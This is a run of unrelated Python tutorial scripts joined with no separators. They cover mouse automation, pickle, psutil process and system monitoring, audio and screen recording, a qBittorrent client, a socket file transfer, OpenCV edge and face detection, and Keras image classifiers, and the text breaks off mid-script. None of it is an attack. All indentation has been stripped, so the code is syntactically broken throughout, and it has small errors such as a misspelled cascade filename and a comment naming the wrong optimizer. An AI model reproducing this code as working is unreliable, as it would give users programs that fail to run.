mouse.drag(0, 0, 100, 100, absolute=False, duration=0.1)
# whether a button is clicked
print(mouse.is_pressed('right'))
# move 100 right & 100 down
mouse.move(100, 100, absolute=False, duration=0.2)
# make a listener when left button is clicked
mouse.on_click(lambda: print("Left Button clicked."))
# make a listener when right button is clicked
mouse.on_right_click(lambda: print("Right Button clicked."))
# remove the listeners when you want
mouse.unhook_all()
# scroll down
mouse.wheel(-1)
# scroll up
mouse.wheel(1)
# record until you click right
events = mouse.record()
# replay these events
mouse.play(events[:-1])
import pickle
# define any Python data structure including lists, sets, tuples, dicts, etc.
l = list(range(10000))
# save it to a file
with open("list.pickle", "wb") as file:
pickle.dump(l, file)
# load it again
with open("list.pickle", "rb") as file:
unpickled_l = pickle.load(file)
print("unpickled_l == l: ", unpickled_l == l)
print("unpickled l is l: ", unpickled_l is l)
import pickle
class Person:
def __init__(self, first_name, last_name, age, gender):
self.first_name = first_name
self.last_name = last_name
self.age = age
self.gender = gender
def __str__(self):
return f"<Person name={self.first_name} {self.last_name}, age={self.age}, gender={self.gender}>"
p = Person("John", "Doe", 99, "Male")
# save the object
with open("person.pickle", "wb") as file:
pickle.dump(p, file)
# load the object
with open("person.pickle", "rb") as file:
p2 = pickle.load(file)
print(p)
print(p2)
import pickle
class Person:
def __init__(self, first_name, last_name, age, gender):
self.first_name = first_name
self.last_name = last_name
self.age = age
self.gender = gender
def __str__(self):
return f"<Person name={self.first_name} {self.last_name}, age={self.age}, gender={self.gender}>"
p = Person("John", "Doe", 99, "Male")
# get the dumped bytes
dumped_p = pickle.dumps(p)
print(dumped_p)
# write them to a file
with open("person.pickle", "wb") as file:
file.write(dumped_p)
# load it
with open("person.pickle", "rb") as file:
p2 = pickle.loads(file.read())
print(p)
print(p2)
import camelot
import sys
# PDF file to extract tables from (from command-line)
file = sys.argv[1]
# extract all the tables in the PDF file
tables = camelot.read_pdf(file)
# number of tables extracted
print("Total tables extracted:", tables.n)
# print the first table as Pandas DataFrame
print(tables[0].df)
# export individually
tables[0].to_csv("foo.csv")
# or export all in a zip
tables.export("foo.csv", f="csv", compress=True)
# export to HTML
tables.export("foo.html", f="html")
import psutil
from datetime import datetime
import pandas as pd
import time
import os
def get_size(bytes):
"""
Returns size of bytes in a nice format
"""
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if bytes < 1024:
return f"{bytes:.2f}{unit}B"
bytes /= 1024
def get_processes_info():
# the list the contain all process dictionaries
processes = []
for process in psutil.process_iter():
# get all process info in one shot
with process.oneshot():
# get the process id
pid = process.pid
if pid == 0:
# System Idle Process for Windows NT, useless to see anyways
continue
# get the name of the file executed
name = process.name()
# get the time the process was spawned
try:
create_time = datetime.fromtimestamp(process.create_time())
except OSError:
# system processes, using boot time instead
create_time = datetime.fromtimestamp(psutil.boot_time())
try:
# get the number of CPU cores that can execute this process
cores = len(process.cpu_affinity())
except psutil.AccessDenied:
cores = 0
# get the CPU usage percentage
cpu_usage = process.cpu_percent()
# get the status of the process (running, idle, etc.)
status = process.status()
try:
# get the process priority (a lower value means a more prioritized process)
nice = int(process.nice())
except psutil.AccessDenied:
nice = 0
try:
# get the memory usage in bytes
memory_usage = process.memory_full_info().uss
except psutil.AccessDenied:
memory_usage = 0
# total process read and written bytes
io_counters = process.io_counters()
read_bytes = io_counters.read_bytes
write_bytes = io_counters.write_bytes
# get the number of total threads spawned by this process
n_threads = process.num_threads()
# get the username of user spawned the process
try:
username = process.username()
except psutil.AccessDenied:
username = "N/A"
processes.append({
'pid': pid, 'name': name, 'create_time': create_time,
'cores': cores, 'cpu_usage': cpu_usage, 'status': status, 'nice': nice,
'memory_usage': memory_usage, 'read_bytes': read_bytes, 'write_bytes': write_bytes,
'n_threads': n_threads, 'username': username,
})
return processes
def construct_dataframe(processes):
# convert to pandas dataframe
df = pd.DataFrame(processes)
# set the process id as index of a process
df.set_index('pid', inplace=True)
# sort rows by the column passed as argument
df.sort_values(sort_by, inplace=True, ascending=not descending)
# pretty printing bytes
df['memory_usage'] = df['memory_usage'].apply(get_size)
df['write_bytes'] = df['write_bytes'].apply(get_size)
df['read_bytes'] = df['read_bytes'].apply(get_size)
# convert to proper date format
df['create_time'] = df['create_time'].apply(datetime.strftime, args=("%Y-%m-%d %H:%M:%S",))
# reorder and define used columns
df = df[columns.split(",")]
return df
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Process Viewer & Monitor")
parser.add_argument("-c", "--columns", help="""Columns to show,
available are name,create_time,cores,cpu_usage,status,nice,memory_usage,read_bytes,write_bytes,n_threads,username.
Default is name,cpu_usage,memory_usage,read_bytes,write_bytes,status,create_time,nice,n_threads,cores.""",
default="name,cpu_usage,memory_usage,read_bytes,write_bytes,status,create_time,nice,n_threads,cores")
parser.add_argument("-s", "--sort-by", dest="sort_by", help="Column to sort by, default is memory_usage .", default="memory_usage")
parser.add_argument("--descending", action="store_true", help="Whether to sort in descending order.")
parser.add_argument("-n", help="Number of processes to show, will show all if 0 is specified, default is 25 .", default=25)
parser.add_argument("-u", "--live-update", action="store_true", help="Whether to keep the program on and updating process information each second")
# parse arguments
args = parser.parse_args()
columns = args.columns
sort_by = args.sort_by
descending = args.descending
n = int(args.n)
live_update = args.live_update
# print the processes for the first time
processes = get_processes_info()
df = construct_dataframe(processes)
if n == 0:
print(df.to_string())
elif n > 0:
print(df.head(n).to_string())
# print continuously
while live_update:
# get all process info
processes = get_processes_info()
df = construct_dataframe(processes)
# clear the screen depending on your OS
os.system("cls") if "nt" in os.name else os.system("clear")
if n == 0:
print(df.to_string())
elif n > 0:
print(df.head(n).to_string())
time.sleep(0.7)
from playsound import playsound
import sys
playsound(sys.argv[1])
import pyaudio
import wave
import sys
filename = sys.argv[1]
# set the chunk size of 1024 samples
chunk = 1024
# open the audio file
wf = wave.open(filename, "rb")
# initialize PyAudio object
p = pyaudio.PyAudio()
# open stream object
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
# read data in chunks
data = wf.readframes(chunk)
# writing to the stream (playing audio)
while data:
stream.write(data)
data = wf.readframes(chunk)
# close stream
stream.close()
p.terminate()
from pydub import AudioSegment
from pydub.playback import play
import sys
# read MP3 file
song = AudioSegment.from_mp3(sys.argv[1])
# song = AudioSegment.from_wav("audio_file.wav")
# you can also read from other formats such as MP4
# song = AudioSegment.from_file("audio_file.mp4", "mp4")
play(song)
import pyaudio
import wave
import argparse
parser = argparse.ArgumentParser(description="an Audio Recorder using Python")
parser.add_argument("-o", "--output", help="Output file (with .wav)", default="recorded.wav")
parser.add_argument("-d", "--duration", help="Duration to record in seconds (can be float)", default=5)
args = parser.parse_args()
# the file name output you want to record into
filename = args.output
# number of seconds to record
record_seconds = float(args.duration)
# set the chunk size of 1024 samples
chunk = 1024
# sample format
FORMAT = pyaudio.paInt16
# mono, change to 2 if you want stereo
channels = 1
# 44100 samples per second
sample_rate = 44100
# initialize PyAudio object
p = pyaudio.PyAudio()
# open stream object as input & output
stream = p.open(format=FORMAT,
channels=channels,
rate=sample_rate,
input=True,
output=True,
frames_per_buffer=chunk)
frames = []
print("Recording...")
for i in range(int(44100 / chunk * record_seconds)):
data = stream.read(chunk)
# if you want to hear your voice while recording
# stream.write(data)
frames.append(data)
print("Finished recording.")
# stop and close stream
stream.stop_stream()
stream.close()
# terminate pyaudio object
p.terminate()
# save audio file
# open the file in 'write bytes' mode
wf = wave.open(filename, "wb")
# set the channels
wf.setnchannels(channels)
# set the sample format
wf.setsampwidth(p.get_sample_size(FORMAT))
# set the sample rate
wf.setframerate(sample_rate)
# write the frames as bytes
wf.writeframes(b"".join(frames))
# close the file
wf.close()
import cv2
import numpy as np
import pyautogui
# display screen resolution, get it from your OS settings
SCREEN_SIZE = (1920, 1080)
# define the codec
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
# create the video write object
out = cv2.VideoWriter("output.avi", fourcc, 10.0, (SCREEN_SIZE))
# while True:
for i in range(100):
# make a screenshot
img = pyautogui.screenshot()
# convert these pixels to a proper numpy array to work with OpenCV
frame = np.array(img)
# convert colors from BGR to RGB
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# write the frame
out.write(frame)
# show the frame
# cv2.imshow("screenshot", frame)
# if the user clicks q, it exits
if cv2.waitKey(1) == ord("q"):
break
# make sure everything is closed when exited
cv2.destroyAllWindows()
out.release()
import psutil
import platform
from datetime import datetime
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
print("="*40, "System Information", "="*40)
uname = platform.uname()
print(f"System: {uname.system}")
print(f"Node Name: {uname.node}")
print(f"Release: {uname.release}")
print(f"Version: {uname.version}")
print(f"Machine: {uname.machine}")
print(f"Processor: {uname.processor}")
# Boot Time
print("="*40, "Boot Time", "="*40)
boot_time_timestamp = psutil.boot_time()
bt = datetime.fromtimestamp(boot_time_timestamp)
print(f"Boot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}")
# let's print CPU information
print("="*40, "CPU Info", "="*40)
# number of cores
print("Physical cores:", psutil.cpu_count(logical=False))
print("Total cores:", psutil.cpu_count(logical=True))
# CPU frequencies
cpufreq = psutil.cpu_freq()
print(f"Max Frequency: {cpufreq.max:.2f}Mhz")
print(f"Min Frequency: {cpufreq.min:.2f}Mhz")
print(f"Current Frequency: {cpufreq.current:.2f}Mhz")
# CPU usage
print("CPU Usage Per Core:")
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
print(f"Core {i}: {percentage}%")
print(f"Total CPU Usage: {psutil.cpu_percent()}%")
# Memory Information
print("="*40, "Memory Information", "="*40)
# get the memory details
svmem = psutil.virtual_memory()
print(f"Total: {get_size(svmem.total)}")
print(f"Available: {get_size(svmem.available)}")
print(f"Used: {get_size(svmem.used)}")
print(f"Percentage: {svmem.percent}%")
print("="*20, "SWAP", "="*20)
# get the swap memory details (if exists)
swap = psutil.swap_memory()
print(f"Total: {get_size(swap.total)}")
print(f"Free: {get_size(swap.free)}")
print(f"Used: {get_size(swap.used)}")
print(f"Percentage: {swap.percent}%")
# Disk Information
print("="*40, "Disk Information", "="*40)
print("Partitions and Usage:")
# get all disk partitions
partitions = psutil.disk_partitions()
for partition in partitions:
print(f"=== Device: {partition.device} ===")
print(f" Mountpoint: {partition.mountpoint}")
print(f" File system type: {partition.fstype}")
try:
partition_usage = psutil.disk_usage(partition.mountpoint)
except PermissionError:
# this can be catched due to the disk that
# isn't ready
continue
print(f" Total Size: {get_size(partition_usage.total)}")
print(f" Used: {get_size(partition_usage.used)}")
print(f" Free: {get_size(partition_usage.free)}")
print(f" Percentage: {partition_usage.percent}%")
# get IO statistics since boot
disk_io = psutil.disk_io_counters()
print(f"Total read: {get_size(disk_io.read_bytes)}")
print(f"Total write: {get_size(disk_io.write_bytes)}")
# Network information
print("="*40, "Network Information", "="*40)
# get all network interfaces (virtual and physical)
if_addrs = psutil.net_if_addrs()
for interface_name, interface_addresses in if_addrs.items():
for address in interface_addresses:
print(f"=== Interface: {interface_name} ===")
if str(address.family) == 'AddressFamily.AF_INET':
print(f" IP Address: {address.address}")
print(f" Netmask: {address.netmask}")
print(f" Broadcast IP: {address.broadcast}")
elif str(address.family) == 'AddressFamily.AF_PACKET':
print(f" MAC Address: {address.address}")
print(f" Netmask: {address.netmask}")
print(f" Broadcast MAC: {address.broadcast}")
# get IO statistics since boot
net_io = psutil.net_io_counters()
print(f"Total Bytes Sent: {get_size(net_io.bytes_sent)}")
print(f"Total Bytes Received: {get_size(net_io.bytes_recv)}")
from qbittorrent import Client
# connect to the qbittorent Web UI
qb = Client("http://127.0.0.1:8080/")
# put the credentials (as you configured)
qb.login("admin", "adminadmin")
# open the torrent file of the file you wanna download
torrent_file = open("debian-10.2.0-amd64-netinst.iso.torrent", "rb")
# start downloading
qb.download_from_file(torrent_file)
# this magnet is not valid, replace with yours
# magnet_link = "magnet:?xt=urn:btih:e334ab9ddd91c10938a7....."
# qb.download_from_link(magnet_link)
# you can specify the save path for downloads
# qb.download_from_file(torrent_file, savepath="/the/path/you/want/to/save")
# pause all downloads
qb.pause_all()
# resume them
qb.resume_all()
def get_size_format(b, factor=1024, suffix="B"):
"""
Scale bytes to its proper byte format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
# return list of torrents
torrents = qb.torrents()
for torrent in torrents:
print("Torrent name:", torrent["name"])
print("hash:", torrent["hash"])
print("Seeds:", torrent["num_seeds"])
print("File size:", get_size_format(torrent["total_size"]))
print("Download speed:", get_size_format(torrent["dlspeed"]) + "/s")
# Torrent name: debian-10.2.0-amd64-netinst.iso
# hash: 86d4c80024a469be4c50bc5a102cf71780310074
# Seeds: 70
# File size: 335.00MB
# Download speed: 606.15KB/s
"""
Client that sends the file (uploads)
"""
import socket
import tqdm
import os
import argparse
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 1024 * 4
def send_file(filename, host, port):
# get the file size
filesize = os.path.getsize(filename)
# create the client socket
s = socket.socket()
print(f"[+] Connecting to {host}:{port}")
s.connect((host, port))
print("[+] Connected.")
# send the filename and filesize
s.send(f"{filename}{SEPARATOR}{filesize}".encode())
# start sending the file
progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "rb") as f:
for _ in progress:
# read the bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
# file transmitting is done
break
# we use sendall to assure transimission in
# busy networks
s.sendall(bytes_read)
# update the progress bar
progress.update(len(bytes_read))
# close the socket
s.close()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Simple File Sender")
parser.add_argument("file", help="File name to send")
parser.add_argument("host", help="The host/IP address of the receiver")
parser.add_argument("-p", "--port", help="Port to use, default is 5001", default=5001)
args = parser.parse_args()
filename = args.file
host = args.host
port = args.port
send_file(filename, host, port)
"""
Server receiver of the file
"""
import socket
import tqdm
import os
# device's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5001
# receive 4096 bytes each time
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
# create the server socket
# TCP socket
s = socket.socket()
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
# accept connection if there is any
client_socket, address = s.accept()
# if below code is executed, that means the sender is connected
print(f"[+] {address} is connected.")
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
filename = os.path.basename(filename)
# convert to integer
filesize = int(filesize)
# start receiving the file from the socket
# and writing to the file stream
progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for _ in progress:
# read 1024 bytes from the socket (receive)
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
# nothing is received
# file transmitting is done
break
# write to the file the bytes we just received
f.write(bytes_read)
# update the progress bar
progress.update(len(bytes_read))
# close the client socket
client_socket.close()
# close the server socket
s.close()
import requests
import sys
# get the API KEY here: https://developers.google.com/custom-search/v1/overview
API_KEY = "<INSERT_YOUR_API_KEY_HERE>"
# get your Search Engine ID on your CSE control panel
SEARCH_ENGINE_ID = "<INSERT_YOUR_SEARCH_ENGINE_ID_HERE>"
# the search query you want, from the command line
query = sys.argv[1]
# constructing the URL
# doc: https://developers.google.com/custom-search/v1/using_rest
url = f"https://www.googleapis.com/customsearch/v1?key={API_KEY}&cx={SEARCH_ENGINE_ID}&q={query}"
# make the API request
data = requests.get(url).json()
# get the result items
search_items = data.get("items")
# iterate over 10 results found
for i, search_item in enumerate(search_items, start=1):
# get the page title
title = search_item.get("title")
# page snippet
snippet = search_item.get("snippet")
# alternatively, you can get the HTML snippet (bolded keywords)
html_snippet = search_item.get("htmlSnippet")
# extract the page url
link = search_item.get("link")
# print the results
print("="*10, f"Result #{i}", "="*10)
print("Title:", title)
print("Description:", snippet)
print("URL:", link, "\n")
import cv2
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# convert to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# create a binary thresholded image
_, binary = cv2.threshold(gray, int(sys.argv[2]), 255, cv2.THRESH_BINARY_INV)
# show it
plt.imshow(binary, cmap="gray")
plt.show()
# find the contours from the thresholded image
contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# draw all contours
image = cv2.drawContours(image, contours, -1, (0, 255, 0), 2)
# show the image with the drawn contours
plt.imshow(image)
plt.show()
import cv2
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# convert to grayscale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# create a binary thresholded image
_, binary = cv2.threshold(gray, 255 // 2, 255, cv2.THRESH_BINARY_INV)
# find the contours from the thresholded image
contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# draw all contours
image = cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)
# show the images
cv2.imshow("gray", gray)
cv2.imshow("image", image)
cv2.imshow("binary", binary)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert it to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# show the grayscale image, if you want to show, uncomment 2 below lines
# plt.imshow(gray, cmap="gray")
# plt.show()
# perform the canny edge detector to detect image edges
edges = cv2.Canny(gray, threshold1=30, threshold2=100)
# show the detected edges
plt.imshow(edges, cmap="gray")
plt.show()
import numpy as np
import cv2
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 30, 100)
cv2.imshow("edges", edges)
cv2.imshow("gray", gray)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# print the number of faces detected
print(f"{len(faces)} faces detected in the image.")
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
from train import load_data, batch_size
from tensorflow.keras.models import load_model
import matplotlib.pyplot as plt
import numpy as np
# CIFAR-10 classes
categories = {
0: "airplane",
1: "automobile",
2: "bird",
3: "cat",
4: "deer",
5: "dog",
6: "frog",
7: "horse",
8: "ship",
9: "truck"
}
# load the testing set
# (_, _), (X_test, y_test) = load_data()
ds_train, ds_test, info = load_data()
# load the model with final model weights
model = load_model("results/cifar10-model-v1.h5")
# evaluation
loss, accuracy = model.evaluate(ds_test, steps=info.splits["test"].num_examples // batch_size)
print("Test accuracy:", accuracy*100, "%")
# get prediction for this image
data_sample = next(iter(ds_test))
sample_image = data_sample[0].numpy()[0]
sample_label = categories[data_sample[1].numpy()[0]]
prediction = np.argmax(model.predict(sample_image.reshape(-1, *sample_image.shape))[0])
print("Predicted label:", categories[prediction])
print("True label:", sample_label)
# show the first image
plt.axis('off')
plt.imshow(sample_image)
plt.show()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard
import tensorflow as tf
import tensorflow_datasets as tfds
import os
# hyper-parameters
batch_size = 64
# 10 categories of images (CIFAR-10)
num_classes = 10
# number of training epochs
epochs = 30
def create_model(input_shape):
"""
Constructs the model:
- 32 Convolutional (3x3)
- Relu
- 32 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- 64 Convolutional (3x3)
- Relu
- 64 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- 128 Convolutional (3x3)
- Relu
- 128 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- Flatten (To make a 1D vector out of convolutional layers)
- 1024 Fully connected units
- Relu
- Dropout
- 10 Fully connected units (each corresponds to a label category (cat, dog, etc.))
"""
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(3, 3), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(1024))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation="softmax"))
# print the summary of the model architecture
model.summary()
# training the model using adam optimizer
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
return model
def load_data():
"""
This function loads CIFAR-10 dataset, and preprocess it
"""
# Loading data using Keras
# loading the CIFAR-10 dataset, splitted between train and test sets
# (X_train, y_train), (X_test, y_test) = cifar10.load_data()
# print("Training samples:", X_train.shape[0])
# print("Testing samples:", X_test.shape[0])
# print(f"Images shape: {X_train.shape[1:]}")
# # converting image labels to binary class matrices
# y_train = to_categorical(y_train, num_classes)
# y_test = to_categorical(y_test, num_classes)
# # convert to floats instead of int, so we can divide by 255
# X_train = X_train.astype("float32")
# X_test = X_test.astype("float32")
# X_train /= 255
# X_test /= 255
# return (X_train, y_train), (X_test, y_test)
# Loading data using Tensorflow Datasets
def preprocess_image(image, label):
# convert [0, 255] range integers to [0, 1] range floats
image = tf.image.convert_image_dtype(image, tf.float32)
return image, label
# loading the CIFAR-10 dataset, splitted between train and test sets
ds_train, info = tfds.load("cifar10", with_info=True, split="train", as_supervised=True)
ds_test = tfds.load("cifar10", split="test", as_supervised=True)
# repeat dataset forever, shuffle, preprocess, split by batch
ds_train = ds_train.repeat().shuffle(1024).map(preprocess_image).batch(batch_size)
ds_test = ds_test.repeat().shuffle(1024).map(preprocess_image).batch(batch_size)
return ds_train, ds_test, info
if __name__ == "__main__":
# load the data
ds_train, ds_test, info = load_data()
# (X_train, y_train), (X_test, y_test) = load_data()
# constructs the model
# model = create_model(input_shape=X_train.shape[1:])
model = create_model(input_shape=info.features["image"].shape)
# some nice callbacks
logdir = os.path.join("logs", "cifar10-model-v1")
tensorboard = TensorBoard(log_dir=logdir)
# make sure results folder exist
if not os.path.isdir("results"):
os.mkdir("results")
# train
# model.fit(X_train, y_train,
# batch_size=batch_size,
# epochs=epochs,
# validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
# shuffle=True)
model.fit(ds_train, epochs=epochs, validation_data=ds_test, verbose=1,
steps_per_epoch=info.splits["train"].num_examples // batch_size,
validation_steps=info.splits["test"].num_examples // batch_size,
callbacks=[tensorboard])
# save the model to disk
model.save("results/cifar10-model-v1.h5")
from train import load_data, create_model, IMAGE_SHAPE, batch_size, np
import matplotlib.pyplot as plt
# load the data generators
train_generator, validation_generator, class_names = load_data()
# constructs the model
model = create_model(input_shape=IMAGE_SHAPE)
# load the optimal weights
model.load_weights("results/MobileNetV2_finetune_last5_less_lr-loss-0.45-acc-0.86.h5")
validation_steps_per_epoch = np.ceil(validation_generator.samples / batch_size)
# print the validation loss & accuracy
evaluation = model.evaluate_generator(validation_generator, steps=validation_steps_per_epoch, verbose=1)
print("Val loss:", evaluation[0])
print("Val Accuracy:", evaluation[1])
# get a random batch of images
image_batch, label_batch = next(iter(validation_generator))
# turn the original labels into human-readable text
label_batch = [class_names[np.argmax(label_batch[i])] for i in range(batch_size)]
# predict the images on the model
predicted_class_names = model.predict(image_batch)
predicted_ids = [np.argmax(predicted_class_names[i]) for i in range(batch_size)]
# turn the predicted vectors to human readable labels
predicted_class_names = np.array([class_names[id] for id in predicted_ids])
# some nice plotting
plt.figure(figsize=(10,9))
for n in range(30):
plt.subplot(6,5,n+1)
plt.subplots_adjust(hspace = 0.3)
plt.imshow(image_batch[n])
if predicted_class_names[n] == label_batch[n]:
color = "blue"
title = predicted_class_names[n].title()
else:
color = "red"
title = f"{predicted_class_names[n].title()}, correct:{label_batch[n]}"
plt.title(title, color=color)
plt.axis('off')
_ = plt.suptitle("Model predictions (blue: correct, red: incorrect)")
plt.show()
import tensorflow as tf
from keras.models import Model
from keras.applications import MobileNetV2, ResNet50, InceptionV3 # try to use them and see which is better
from keras.layers import Dense
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.utils import get_file
from keras.preprocessing.image import ImageDataGenerator
import os
import pathlib
import numpy as np
batch_size = 32
num_classes = 5
epochs = 10
IMAGE_SHAPE = (224, 224, 3)
def load_data():
"""This function downloads, extracts, loads, normalizes and one-hot encodes Flower Photos dataset"""
# download the dataset and extract it
data_dir = get_file(origin='https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz',
fname='flower_photos', untar=True)
data_dir = pathlib.Path(data_dir)
# count how many images are there
image_count = len(list(data_dir.glob('*/*.jpg')))
print("Number of images:", image_count)
# get all classes for this dataset (types of flowers) excluding LICENSE file
CLASS_NAMES = np.array([item.name for item in data_dir.glob('*') if item.name != "LICENSE.txt"])
# roses = list(data_dir.glob('roses/*'))
# 20% validation set 80% training set
image_generator = ImageDataGenerator(rescale=1/255, validation_split=0.2)
# make the training dataset generator
train_data_gen = image_generator.flow_from_directory(directory=str(data_dir), batch_size=batch_size,
classes=list(CLASS_NAMES), target_size=(IMAGE_SHAPE[0], IMAGE_SHAPE[1]),
shuffle=True, subset="training")
# make the validation dataset generator
test_data_gen = image_generator.flow_from_directory(directory=str(data_dir), batch_size=batch_size,
classes=list(CLASS_NAMES), target_size=(IMAGE_SHAPE[0], IMAGE_SHAPE[1]),
shuffle=True, subset="validation")
return train_data_gen, test_data_gen, CLASS_NAMES
def create_model(input_shape):
# load MobileNetV2
model = MobileNetV2(input_shape=input_shape)
# remove the last fully connected layer
model.layers.pop()
# freeze all the weights of the model except the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our own fully connected layer for classification
output = Dense(num_classes, activation="softmax")
# connect that dense layer to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
# print the summary of the model architecture
model.summary()
# training the model using rmsprop optimizer
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
return model
if __name__ == "__main__":
# load the data generators
train_generator, validation_generator, class_names = load_data()
# constructs the model
model = create_model(input_shape=IMAGE_SHAPE)
# model name
model_name = "MobileNetV2_finetune_last5"
# some nice callbacks
tensorboard = TensorBoard(log_dir=f"logs/{model_name}")
checkpoint = ModelCheckpoint(f"results/{model_name}" + "-loss-{val_loss:.2f}-acc-{val_acc:.2f}.h5",
save_best_only=True,
verbose=1)
# make sure results folder exist
if not os.path.isdir("results"):
os.mkdir("results")
# count number of steps per epoch
training_steps_per_epoch = np.ceil(train_generator.samples / batch_size)
validation_steps_per_epoch = np.ceil(validation_generator.samples / batch_size)
# train using the generators
model.fit_generator(train_generator, steps_per_epoch=training_steps_per_epoch,
validation_data=validation_generator, validation_steps=validation_steps_per_epoch,
epochs=epochs, verbose=1, callbacks=[tensorboard, checkpoint])
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# reshape the image to a 2D array of pixels and 3 color values (RGB)
pixel_values = image.reshape((-1, 3))
# convert to float
pixel_values = np.float32(pixel_values)
# define stopping criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2)
# number of clusters (K)
